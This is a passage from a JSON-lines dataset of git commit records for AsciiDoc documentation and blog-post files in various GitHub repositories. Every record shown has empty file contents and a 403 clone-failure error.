2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62797612549fbfc23e342624b864135715bd79ee","subject":"Update 2011-08-04-Eclipse-Kepler-est-arrive.adoc","message":"Update 2011-08-04-Eclipse-Kepler-est-arrive.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-08-04-Eclipse-Kepler-est-arrive.adoc","new_file":"_posts\/2011-08-04-Eclipse-Kepler-est-arrive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8b43c518b2e4b451f457a1a57f9c942d97e6bc5","subject":"Update 2016-02-23-Mickeys-Soundsational-Parade-live-streaming-event-tomorrow.adoc","message":"Update 2016-02-23-Mickeys-Soundsational-Parade-live-streaming-event-tomorrow.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-23-Mickeys-Soundsational-Parade-live-streaming-event-tomorrow.adoc","new_file":"_posts\/2016-02-23-Mickeys-Soundsational-Parade-live-streaming-event-tomorrow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5affb8f5a6f3c109f3b153f9a8d0911f8ac1db90","subject":"Update 2016-05-17-Modelling-Microservice-Patterns-in-Code.adoc","message":"Update 2016-05-17-Modelling-Microservice-Patterns-in-Code.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-05-17-Modelling-Microservice-Patterns-in-Code.adoc","new_file":"_posts\/2016-05-17-Modelling-Microservice-Patterns-in-Code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"578ae7e9b374beff1625c2488cb6e57bffee8fd1","subject":"Add minimal doc for camel-hystrix","message":"Add minimal doc for camel-hystrix\n","repos":"jonmcewen\/camel,nicolaferraro\/camel,jamesnetherton\/camel,prashant2402\/camel,anton-k11\/camel,CodeSmell\/camel,pax95\/camel,snurmine\/camel,christophd\/camel,snurmine\/camel,curso007\/camel,apache\/camel,davidkarlsen\/camel,DariusX\/camel,scranton\/camel,nboukhed\/camel,pkletsko\/camel,rmarting\/camel,alvinkwekel\/camel,tdiesler\/camel,prashant2402\/camel,alvinkwekel\/camel,onders86\/camel,objectiser\/camel,pax95\/camel,Thopap\/camel,yuruki\/camel,onders86\/camel,jamesnetherton\/camel,Fabryprog\/camel,christophd\/camel,isavin\/camel,pmoerenhout\/camel,tlehoux\/camel,scranton\/camel,DariusX\/camel,tlehoux\/camel,zregvart\/camel,isavin\/camel,yuruki\/camel,alvinkwekel\/camel,pmoerenhout\/camel,objectiser\/camel,gautric\/camel,scranton\/camel,scranton\/camel,acartapanis\/camel,DariusX\/camel,tadayosi\/camel,pkletsko\/camel,pkletsko\/camel,davidkarlsen\/camel,jamesnetherton\/camel,pkletsko\/camel,isavin\/camel,pkletsko\/camel,CodeSmell\/camel,prashant2402\/camel,acartapanis\/camel,acartapanis\/camel,Thopap\/camel,rmarting\/camel,gautric\/camel,adessaigne\/camel,dmvolod\/camel,curso007\/camel,jonmcewen\/camel,kevinearls\/camel,tlehoux\/camel,acartapanis\/camel,curso007\/camel,zregvart\/camel,christophd\/camel,snurmine\/camel,prashant2402\/camel,kevinearls\/camel,dmvolod\/camel,sverkera\/camel,tdiesler\/camel,anoordover\/camel,cunningt\/camel,gautric\/camel,jonmcewen\/camel,cunningt\/camel,yuruki\/camel,apache\/camel,sverkera\/camel,apache\/camel,anoordover\/camel,isavin\/camel,adessaigne\/camel,tadayosi\/camel,Thopap\/camel,nicolaferraro\/camel,alvinkwekel\/camel,snurmine\/camel,anoordover\/camel,onders86\/camel,scranton\/camel,punkhorn\/camel-upstream,tlehoux\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,mgyongyosi\/camel,tdiesler\/camel,ullgren\/camel,pmoerenhout\/camel,adessaigne\/camel,nboukhed\/camel,nboukhed\/camel,isavin\/camel,gautric\/camel,gautric\/camel,drsquidop\/camel,tdiesler\/camel,nikhilvibhav\/camel,prashant2402\/camel,objectiser\/camel,nboukhed\/camel,kevinearls\/camel,tadayosi\/camel,mgyongyosi\/camel,kevinearls\/camel,sverkera\/camel,anton-k11\/camel,acartapanis\/camel,mgyongyosi\/camel,christophd\/camel,pax95\/camel,rmarting\/camel,anoordover\/camel,cunningt\/camel,tdiesler\/camel,drsquidop\/camel,tlehoux\/camel,akhettar\/camel,nboukhed\/camel,zregvart\/camel,pax95\/camel,jonmcewen\/camel,dmvolod\/camel,DariusX\/camel,curso007\/camel,adessaigne\/camel,dmvolod\/camel,pmoerenhout\/camel,drsquidop\/camel,akhettar\/camel,yuruki\/camel,ullgren\/camel,mcollovati\/camel,anton-k11\/camel,cunningt\/camel,drsquidop\/camel,mcollovati\/camel,davidkarlsen\/camel,curso007\/camel,jonmcewen\/camel,tadayosi\/camel,Fabryprog\/camel,rmarting\/camel,scranton\/camel,drsquidop\/camel,tadayosi\/camel,apache\/camel,Fabryprog\/camel,apache\/camel,mcollovati\/camel,davidkarlsen\/camel,gnodet\/camel,nicolaferraro\/camel,christophd\/camel,Thopap\/camel,gnodet\/camel,mgyongyosi\/camel,anoordover\/camel,pmoerenhout\/camel,anoordover\/camel,kevinearls\/camel,mgyongyosi\/camel,rmarting\/camel,tadayosi\/camel,gnodet\/camel,tdiesler\/camel,salikjan\/camel,yuruki\/camel,punkhorn\/camel-upstream,curso007\/camel,sverkera\/camel,zregvart\/camel,jonmcewen\/camel,objectiser\/camel,salikjan\/camel,akhettar\/camel,anton-k11\/camel,mcollovati\/camel,onders86\/camel,gnodet\/camel,nicolaferraro\/camel,CodeSmell\/camel,akhettar\/camel,jamesnetherton\/camel,christophd\/camel,cunningt\/camel,rmarting\/camel,jamesnetherton\/camel,anton-k11\/camel,tlehoux\/camel,akhettar\/camel,dmvolod\/camel,nboukhed\/camel,acartapanis\/camel,akhettar\/camel,Fabryprog\/camel,snurmine\/camel,nikhilvibhav\/camel,gautric\/camel,cunningt\/camel,punkhorn\/camel-upstream,pax95\/camel,pax95\/camel,isavin\/camel,anton-k11\/camel,ullgren\/camel,mgyongyosi\/camel,gnodet\/camel,yuruki\/camel,Thopap\/camel,onders86\/camel,prashant2402\/camel,dmvolod\/camel,punkhorn\/camel-upstream,onders86\/camel,Thopap\/camel,snurmine\/camel,adessaigne\/camel,kevinearls\/camel,drsquidop\/camel,CodeSmell\/camel,nikhilvibhav\/camel,adessaigne\/camel,sverkera\/camel,jamesnetherton\/camel,apache\/camel,pkletsko\/camel,sverkera\/camel,ullgren\/camel","old_file":"components\/camel-hystrix\/src\/main\/docs\/hystrix.adoc","new_file":"components\/camel-hystrix\/src\/main\/docs\/hystrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77c69bb6213b91dc25039518ca08a4e1872515d2","subject":"Added docs for file repos","message":"Added docs for file repos\n","repos":"woq-blended\/blended,lefou\/blended,woq-blended\/blended,lefou\/blended","old_file":"doc\/FileRepository.adoc","new_file":"doc\/FileRepository.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"76ec7e66e9227542a3986799599bd04bc7b51fb9","subject":"WIP: Adding some missing 0.10.0 release notes","message":"WIP: Adding some missing 0.10.0 release notes\n\nThis isn't complete and is missing some information, but it should\ngive us a head start. Several TODOs need to be addressed before\nthis is complete.\n\nChange-Id: Ibdc9fd57b05434874845ffa9c0ff905b5b8d0422\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3802\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e0289a22b73665e746b415b77fef8a3982399af","subject":"Update 2016-05-16-On-the-road-again-Scala-days-Berlin-2016.adoc","message":"Update 2016-05-16-On-the-road-again-Scala-days-Berlin-2016.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-05-16-On-the-road-again-Scala-days-Berlin-2016.adoc","new_file":"_posts\/2016-05-16-On-the-road-again-Scala-days-Berlin-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebe64c3eaa42cb0de51e00906b8721b30d02931a","subject":"y2b create post How To Try Secret Smartphones Before They Launch...","message":"y2b create post How To Try Secret Smartphones Before They Launch...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-06-How-To-Try-Secret-Smartphones-Before-They-Launch.adoc","new_file":"_posts\/2017-04-06-How-To-Try-Secret-Smartphones-Before-They-Launch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"988980c8d785e020fa11ccc1730a5076c5e0f59a","subject":"Update 2019-01-31-How-to-modify-smbios-information-on-container-co.adoc","message":"Update 2019-01-31-How-to-modify-smbios-information-on-container-co.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2019-01-31-How-to-modify-smbios-information-on-container-co.adoc","new_file":"_posts\/2019-01-31-How-to-modify-smbios-information-on-container-co.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"505208a0d57f89291af2bfbc828a2107160c6b16","subject":"y2b create post 7TB Storage For The Mac Pro (Mediasonic Pro Box Unboxing + Setup)","message":"y2b create post 7TB Storage For The Mac Pro (Mediasonic Pro Box Unboxing + Setup)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-02-26-7TB-Storage-For-The-Mac-Pro-Mediasonic-Pro-Box-Unboxing--Setup.adoc","new_file":"_posts\/2014-02-26-7TB-Storage-For-The-Mac-Pro-Mediasonic-Pro-Box-Unboxing--Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3052f6499ee0299bee7a40287145b6ce0fab113d","subject":"Add AM installation guide","message":"Add AM installation guide\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/am\/installation-guide\/installation-guide.adoc","new_file":"pages\/am\/installation-guide\/installation-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d61dce08148162425e651b8a8037df60f970cf07","subject":"sf clojurebridge 09\/16\/17 event","message":"sf clojurebridge 09\/16\/17 event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojurebridge-sanfrancisco.adoc","new_file":"content\/events\/2017\/clojurebridge-sanfrancisco.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"df8f82f6732293dcdf3c1dc60c4263f20ea80498","subject":"richa's instructions.","message":"richa's instructions.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/redeploy.adoc","new_file":"docs\/redeploy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a6370bba18b657534c45733dc1f46d13c3aa6f5","subject":"Update 2015-07-13-Work-in-progress-bash-script-to-install-Future-Pinball-on-Ubuntu.adoc","message":"Update 2015-07-13-Work-in-progress-bash-script-to-install-Future-Pinball-on-Ubuntu.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-13-Work-in-progress-bash-script-to-install-Future-Pinball-on-Ubuntu.adoc","new_file":"_posts\/2015-07-13-Work-in-progress-bash-script-to-install-Future-Pinball-on-Ubuntu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f86550d0e92e1b1f84512592dc4a93d66049352a","subject":"y2b create post The Triple Monitor Mega MacBook!","message":"y2b create post The Triple Monitor Mega MacBook!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-29-The-Triple-Monitor-Mega-MacBook.adoc","new_file":"_posts\/2016-07-29-The-Triple-Monitor-Mega-MacBook.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4c0852c53aad62b074b3e6792e421723ca3535a","subject":"polish readme","message":"polish readme\n","repos":"axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot","old_file":"spring-boot-samples\/spring-boot-sample-metrics-atsd\/README.adoc","new_file":"spring-boot-samples\/spring-boot-sample-metrics-atsd\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/axibase\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b634752b761425576c0868284301e45d3bf8a2e7","subject":"[DOC] Add WAN configuration option relates #577","message":"[DOC] Add WAN configuration option\nrelates #577\n","repos":"xjrk58\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d0d8c94b07328b3929c6184c4bd2ac21b37e04a8","subject":"Change configuration order","message":"Change configuration order\n\nHave swapped the config order of \"es.ser.writer.value.class\" & \"es.ser.reader.value.class\" to match the correct description.\n","repos":"pranavraman\/elasticsearch-hadoop,lgscofield\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,cgvarela\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,girirajsharma\/elasticsearch-hadoop,yonglehou\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b1693934b3a3401c2b72fe266b9db10e9b26b562","subject":"Update 2017-09-18-Syntactically-correct-and-type-safe-JPA-queries-in-Play-20.adoc","message":"Update 2017-09-18-Syntactically-correct-and-type-safe-JPA-queries-in-Play-20.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2017-09-18-Syntactically-correct-and-type-safe-JPA-queries-in-Play-20.adoc","new_file":"_posts\/2017-09-18-Syntactically-correct-and-type-safe-JPA-queries-in-Play-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e20484cb73d954b125c6d9b983ea21c65f7adbb4","subject":"Create dummy Release Notes for 4.9 on main","message":"Create dummy Release Notes for 4.9 on main\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"release_notes\/ocp-4-9-release-notes.adoc","new_file":"release_notes\/ocp-4-9-release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f0f8fb6e5f97bb1a5d9f5ee98610e71eb960fa91","subject":"SQL: Fix doc pointer to SQL's tests","message":"SQL: Fix doc pointer to SQL's tests\n\nThe docs include portions of the SQL tests and for that to work they\nneed to point to position of the tests. They use a relative directory\nbut relative to *what*? That turns out to be a fairly complex thing to\nanswer, luckilly, `index.x.asciidoc` defines `xes-repo-dir` which points\nto the root of the xpack docs. We can use that to find the sql tests\nwithout having to answer the \"relative to what?\" question in two places.\n\nOriginal commit: elastic\/x-pack-elasticsearch@ebea586fdf7bed7663c27193e3a304ab768598c8\n","repos":"GlenRSmith\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/sql\/index.asciidoc","new_file":"docs\/en\/sql\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fff9d913df824c3c2916190091363c4016e35e8e","subject":"CAMEL-14545: Add doc about camel-catalog","message":"CAMEL-14545: Add doc about camel-catalog\n","repos":"christophd\/camel,christophd\/camel,adessaigne\/camel,tdiesler\/camel,tdiesler\/camel,nicolaferraro\/camel,pmoerenhout\/camel,pmoerenhout\/camel,christophd\/camel,pax95\/camel,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,mcollovati\/camel,apache\/camel,mcollovati\/camel,apache\/camel,ullgren\/camel,tadayosi\/camel,pmoerenhout\/camel,zregvart\/camel,nikhilvibhav\/camel,mcollovati\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,tdiesler\/camel,zregvart\/camel,nicolaferraro\/camel,pmoerenhout\/camel,DariusX\/camel,gnodet\/camel,adessaigne\/camel,christophd\/camel,pax95\/camel,apache\/camel,pmoerenhout\/camel,cunningt\/camel,apache\/camel,tdiesler\/camel,pax95\/camel,cunningt\/camel,DariusX\/camel,christophd\/camel,tadayosi\/camel,ullgren\/camel,zregvart\/camel,mcollovati\/camel,pax95\/camel,ullgren\/camel,tadayosi\/camel,cunningt\/camel,nicolaferraro\/camel,gnodet\/camel,DariusX\/camel,tdiesler\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,tdiesler\/camel,adessaigne\/camel,alvinkwekel\/camel,ullgren\/camel,DariusX\/camel,pax95\/camel,zregvart\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel,alvinkwekel\/camel,gnodet\/camel,alvinkwekel\/camel,apache\/camel,adessaigne\/camel,cunningt\/camel,gnodet\/camel,nikhilvibhav\/camel,alvinkwekel\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-catalog.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-catalog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"baeec76f78e1a2eb88759d709040b5a59f07f317","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae3a089dcaf9e6e8106d4b44937902a9929439c0","subject":"Update 2016-09-innovation-engineer-aruaru.adoc","message":"Update 2016-09-innovation-engineer-aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7dc16befe42d578a3bdda7eb3ba62d0053e3242","subject":"Update 2017-12-23-Website-update.adoc","message":"Update 2017-12-23-Website-update.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-12-23-Website-update.adoc","new_file":"_posts\/2017-12-23-Website-update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a87309a038925151217304689c880b69810e457","subject":"Intro & ex JAXB","message":"Intro & ex JAXB\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"JAXB.adoc","new_file":"JAXB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dc0bf2d0b67d064dde3f58ceacdd0ba1f65901e","subject":"iterm: Add a `prerequisites` section to the readme","message":"iterm: Add a `prerequisites` section to the readme\n\nThe prerequisites are simple: in order to be able to use the iTerm2\nconfiguration, you have to install iTerm2.\n\nI recommend installing the nightly version, because it contains features\nthat I am going to make use of in the future.\n","repos":"PigeonF\/.dotfiles","old_file":"iterm2\/README.adoc","new_file":"iterm2\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6af2e551d6929405cf567d84abfe3009de606cd7","subject":"Update 2016-07-15-The-first-post.adoc","message":"Update 2016-07-15-The-first-post.adoc","repos":"rynop\/rynop.hubpress.io,rynop\/rynop.hubpress.io,rynop\/rynop.hubpress.io,rynop\/rynop.hubpress.io","old_file":"_posts\/2016-07-15-The-first-post.adoc","new_file":"_posts\/2016-07-15-The-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rynop\/rynop.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b47032527e085ef2095cb130ac7de31f1ff77b31","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b2a3372e703ca6eef5b14b98ba3718cbfdd418d","subject":"Update 2015-12-21-Flask-Template.adoc","message":"Update 2015-12-21-Flask-Template.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-21-Flask-Template.adoc","new_file":"_posts\/2015-12-21-Flask-Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1702be81d3245a8295b07ca068a06349d18c891c","subject":"Create using-ses-with-aws.adoc","message":"Create using-ses-with-aws.adoc\n\nIn progress","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/using-ses-with-aws.adoc","new_file":"userguide\/tutorials\/using-ses-with-aws.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f83ec1639ededeefd4c6dd7a6292ab198bd3429b","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 